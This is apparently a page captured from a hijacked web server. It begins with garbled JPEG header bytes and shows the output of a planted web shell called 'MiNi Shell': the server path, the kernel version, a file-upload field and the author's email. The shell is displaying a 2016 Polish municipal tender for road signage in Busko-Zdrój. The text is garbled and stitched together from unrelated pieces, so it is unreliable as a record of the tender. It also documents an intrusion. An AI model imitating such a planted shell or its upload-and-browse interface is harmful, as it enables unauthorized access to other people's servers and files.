JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160217/34934-N-2016.html

<p class="kh_header"><b>Busko-Zdrój: Bieżące oznakowanie pionowe i poziome na terenie miasta i gminy Busko-Zdrój</b><br>
<b>Numer ogłoszenia: 34934 - 2016; data zamieszczenia: 17.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące oznakowanie pionowe i poziome na terenie miasta i gminy Busko-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Postanowienia ogólne:
1.1) Przedmiotem zamówienia jest bieżące oznakowanie pionowe i poziome na terenie  miasta i gminy Busko-Zdrój, a w tym:                                        	
	OZNAKOWANIE PIONOWE. Rodzaj robót:
1. Montaż słupków stalowych ocynkowanych o średnicy  60 mm do znaków lub tablic - nawierzchnia gruntowa - materiał Wykonawcy - ilość: 50 szt.,
2. Montaż słupków stalowych ocynkowanych o średnicy  60 mm do znaków lub tablic wraz  z odtworzeniem nawierzchni chodników - materiał Wykonawcy - ilość: 100 szt.,
3. Montaż słupków do znaków lub tablic pochodzących z demontażu - materiał Zamawiającego - ilość: 15 szt.,
4. Demontaż słupków do znaków lub tablic do znaków - ilość: 60 szt.,
5. Montaż tarcz znaków drogowych zakazu, nakazu, ostrzegawczych
informacyjnych, (grupa znaków *małe*) - materiał Wykonawcy - ilość:	80 szt.,
6. Montaż tarcz znaków drogowych zakazu, nakazu, ostrzegawczych
informacyjnych, (grupa znaków *średnie*) - materiał Wykonawcy - ilość: 100 szt.,
7. Montaż tarcz znaków drogowych zakazu, nakazu, ostrzegawczych,
informacyjnych pochodzących z demontażu - materiał Zamawiającego - ilość: 30 szt., 
8. Demontaż tarcz znaków bez względu na wielkość - ilość: 70 szt.,
9. Wykonanie i montaż pod znakami tabliczek informacyjnych o treści 
podanej przez Zamawiającego - materiał Wykonawcy - ilość: 50 szt.,
10. Montaż tablicy D-44 i D-45 - materiał Wykonawcy - ilość: 4 szt.,
11. Montaż elementów progów zwalniających małych o wymiarach 600x500x50 mm - element podstawowy - materiał  Wykonawcy - ilość: 20 szt.,
12. Montaż elementów progów zwalniających małych o wymiarach 600x350x50 mm - element zakończenia - materiał Wykonawcy - ilość: 4 szt.,
13. Montaż elementów progów podrzutowych liniowych o wymiarach 355x260x55 mm  - element podstawowy - materiał  Wykonawcy - ilość: 10 szt.,
14. Montaż elementów progów podrzutowych liniowych o wymiarach 355x260x55 mm  - element zakończenia - materiał  Wykonawcy - ilość: 4 szt.,
15. Montaż elementów progów zwalniających o wymiarach 900x500x50 - element podstawowy - materiał Wykonawcy - ilość: 10 szt.,
16. Montaż elementów progów zwalniających o wymiarach 900x450x50 - element zakończenia - materiał Wykonawcy - ilość: 4 szt.,
17. Montaż słupków do barier łańcuchowych - materiał Wykonawcy - ilość: 20 szt.,
18. Montaż łańcuchów do barierek - materiał Wykonawcy - ilość: 20 mb,
19. Montaż lustra drogowego U-18a, O60cm - materiał Wykonawcy - ilość: 6 szt.,
20. Montaż lustra drogowego U-18a, O80cm - materiał Wykonawcy - ilość: 4 szt.,
21. Montaż wygrodzenia segmentowego z profili aluminiowych z wypełnieniem szczelin z płyt poliwęglanowych (chlapacz) wysokości 1,0 m	- ilość: 20 mb,
22. Montaż ochronnych barierek drogowych SP-09 - materiał Wykonawcy - ilość: 100 mb, 
23. Naprawa elementów progów zwalniających bez ich wymiany /przykręcenie/ - ilość: 30 szt., 
24. Wykonanie bariery ozdobnej z rur stalowych  O50cm z wewnętrznym rombem po przekątnej, rozstaw słupków 2,0 m, malowana proszkowo - ilość: 100 mb,
25. Wykonanie ogrodzenia ażurowego typu U-12 (wysokość 1050mm, długość panela 2000 mm) - ilość: 50 mb, 
26. Montaż blokad parkingowych  Z-6 - ilość: 5 szt.,
	OZNAKOWANIE POZIOME. Rodzaj robót:	
27. Wykonanie znaków poprzecznych w tym przejść dla pieszych - masa chemoutwardzalna  grubowarstwowo do nakładania - ilość: 1500 m2,
28. Odnowienie oznakowania poziomego jezdni farbą akrylową z użyciem mikrokulek szklanych - ilość: 2000 m2,
29. Wykonanie nowego oznakowania poziomego jezdni farbą akrylową z użyciem mikrokulek szklanych - ilość:	200 m2,
30. Usuwanie istniejącego oznakowania poziomego - ilość: 100 m2.

Zakres prac:
1.2) W zakresie oznakowania poziomego należy uwzględnić wykonanie:
a) oznakowania poziomego cienkowarstwowego - znaków drogowych poziomych,  umieszczonych na nawierzchni w postaci  linii ciągłych lub przerywanych,  pojedynczych lub podwójnych, strzałek, napisów symboli oraz innych linii związanych  z oznaczeniem określonych miejsc na tej nawierzchni.
b) znaków poprzecznych - wyznaczających miejsca przeznaczone do ruchu pieszych i  rowerzystów w poprzek jezdni oraz miejsca zatrzymania pojazdów.
c) znaków uzupełniających -  w postaci symboli, napisów, linii przystankowych oraz  innych określających szczególne miejsca na nawierzchni.                  
d) usunięcie oznakowania poziomego poprzez frezowanie, piaskowanie lub innym  sposobem.
1.3) Roczna ilość robót jest szacunkową ilością określoną na podstawie wielkości zrealizowanego zamówienia w 2015 r. 
Ilość ta może ulec zmianie (zmniejszenie lub zwiększenie zakresu)  
Wynagrodzenie należne Wykonawcy zostanie określone na podstawie faktycznej   ilości wykonanych robót z uwzględnieniem cen  jednostkowych podanych w  ofercie.
1.4) Zabezpieczenie i oznakowanie miejsc prowadzonych robót należy do obowiązków  Wykonawcy.
1.5)  Materiał Wykonawcy jest materiałem nowym, na który posiada świadectwo jakości.
1.6) Szczegółowy zakres robót określają:
a) formularz oferty - załącznik Nr 1 do SIWZ;
b) projekt umowy - załącznik Nr 8 do SIWZ;
c) specyfikacja techniczna wykonania i odbioru robót - załącznik Nr 9 do SIWZ;  

2) Wymogi dla materiałów:
a) znaki drogowe typu A,B,C,D,E,F,G,T,U, progi zwalniające i lustra drogowe powinny  posiadać certyfikat wydany przez Instytut Badawczy Dróg i Mostów  lub inne upoważnione jednostki,
b) znaki powinny być:
  - wykonane z folii typu II (II generacji) dla znaków o symbolach:A-7, B-2, B-20, D-6, D-6a,  D-6b 
  - wykonane z folii typu I ( I generacji) dla pozostałych znaków i tablic,
  - wykonane z blachy ocynkowanej,
  - podwójnie zaginane na całym obwodzie,
  - pomalowane z zastosowaniem farby proszkowej.
c) słupki do znaków powinny być wykonane z rur ocynkowanych o średnicach 60 mm, winny  posiadać kotwy uniemożliwiające obrót elementu ( po jego osadzeniu ) w gruncie wokół  jego osi. Długości słupków należy dostosować w zależności od konfiguracji mocowanego  na  nich znakowania z zachowaniem wymaganych skrajni pionowych określonych w Rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie 	szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz 	urządzeń bezpieczeństwa  ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r. Nr 220,  poz. 2181 z późn. zm.).                                                                                                           
d) materiały do poziomego znakowania dróg - materiały zawierające rozpuszczalniki,  wolne od rozpuszczalników lub punktowe elementy odblaskowe, które mogą zostać naniesione albo wbudowane przez malowanie, natryskiwanie, odlewanie, wytłaczanie,    rolowanie, klejenie itp. na nawierzchnie drogowe, stosowane w temperaturze    otoczenia lub w temperaturze podwyższonej. Materiały te powinny być retrorefleksyjne.         
e) oznakowanie poziome cienkowarstwowe powinno być wykonane poprzez nałożenie   warstwy grubości od 0,3 do 0,8 mm na mokro z użyciem refleksyjnych kulek    szklanych                                                                                                         f) oznakowanie poziome grubowarstwowe powinno być wykonane poprzez nałożenie  warstwy grubości od 0,9 do 3,5 mm masy chemoutwardzalnej aplikowanej na zimno.
g)  każdy materiał używany przez wykonawcę do poziomego oznakowania dróg musi  posiadać aprobatę techniczną..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8, 45.23.32.92-2, 45.23.32.21-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże wykonanie w okresie ostatnich  5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 najważniejszych robót o wartości co najmniej 60 000 zł brutto każda, polegających na bieżącym utrzymaniu oznakowania pionowego i poziomego
z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże, że w trakcie realizacji zamówienia będzie dysponował:
Niżej wymienionym sprzętem:
       a)  szczotką mechaniczną  -  min 1 szt.,
       b) malowarką samobieżną do oznakowania cienkowarstwowego, z elektronicznym  sterowaniem znakowania, z możliwością regulowania szerokości malowanej linii, oraz  wyposażona w system pneumatyczny do wykonania odblasku  - min 1 szt.
       c)  malowarką do wykonywania drobnych elementów oznakowania cienkowarstwowego,   ze sterowaniem ręcznym wyposażona w system pneumatyczny do wykonania odblasku  - min. 1 szt. 
       d) pojazd z przyczepą z oznakowaniem pulsacyjnym - min 1 szt. 
       e) samochód dostawczy lub ciężarowy do przewożenia elementów oznakowania  pionowego -  min. 1 szt. 
wraz z podaniem informacji o podstawie dysponowania wymienionym sprzętem.
Sprzęt, który zostanie wykorzystany do realizacji przedmiotu zamówienia winien być zgodny z Polskimi Normami i Szczegółowymi Specyfikacjami Technicznymi.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże, ze w trakcie realizacji zamówienia będzie dysponował:
Osobami:
     a)  min. 1 osobą posiadającą uprawnienia do kierowania ruchem drogowym 
     b)  min. 1 osobą pełniącą funkcję kierownika robót z doświadczeniem w kierowaniu na  stanowisku kierownika robót  min. 2 robotami przy  bieżącym utrzymaniu oznakowania  pionowego i poziomego.
     c)  min. 1 osobą posiadającą wymagane prawem kwalifikacje do obsługi sprzętu do  poziomego oznakowania dróg.
wraz z oświadczeniem, że osoby te posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć: 
1.	Wypełniony formularz ofertowy z wykorzystaniem wzoru w/g Załącznika 1, zawierający wygenerowane ceny jednostkowe. Cena jednostkowa poszczególnych pozycji kosztorysowych musi być wyrażona z dokładnością do dwóch miejsc po przecinku, musi zawierać wszystkie narzuty i być podana bez podatku VAT.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadku: 
a) wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na skutek sytuacji niemożliwych wcześniej do przewidzenia,
b) wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy (termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach gdy: 
a)opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy t.j. siła wyższa (np.: klęska żywiołowa, niesprzyjające warunki atmosferyczne). Termin ten zostaje wówczas przedłużony o czas trwania zaistniałych okoliczności - do czasu ustąpienia tych okoliczności;
b) wystąpią roboty dodatkowe;
c) wystąpią na nieruchomości zdarzenia niemożliwe do przewidzenia wcześniej (np. odsłonięcia archeologiczne);
d) wystąpi konieczność uzyskania od organów administracji państwowej dodatkowych decyzji, uzgodnień, pozwoleń, niezbędnych do realizacji zadania;
           e) wystąpią niezależne od Wykonawcy opóźnienia w dostawach materiałów budowlanych,  
             których nie można pozyskać od innych producentów (dostawców) 
f) przedłuży się procedura przetargowa, w związku z wniesionymi odwołaniami lub przedłużeniem okresu związania ofertą.
4. Zmiana zakresu rzeczowego umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, może nastąpić w przypadku wystąpienia różnic w obmiarach w stosunku do przedmiarów robót.
5. Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach:
a) rozliczenia wykonanych robót kosztorysem powykonawczym, na podstawie wskaźników cenowych ujętych w kosztorysie ofertowym, w oparciu o dokonany przez Inspektora nadzoru obmiar robót;
b) zmniejszenia zakresu rzeczowego Umowy, na skutek okoliczności, których nie można było przewidzieć na etapie przygotowania inwestycji do realizacji.
c) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany w podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 36 c.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2016 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku-Zdroju, ul. Mickiewicza 10, pok. Nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com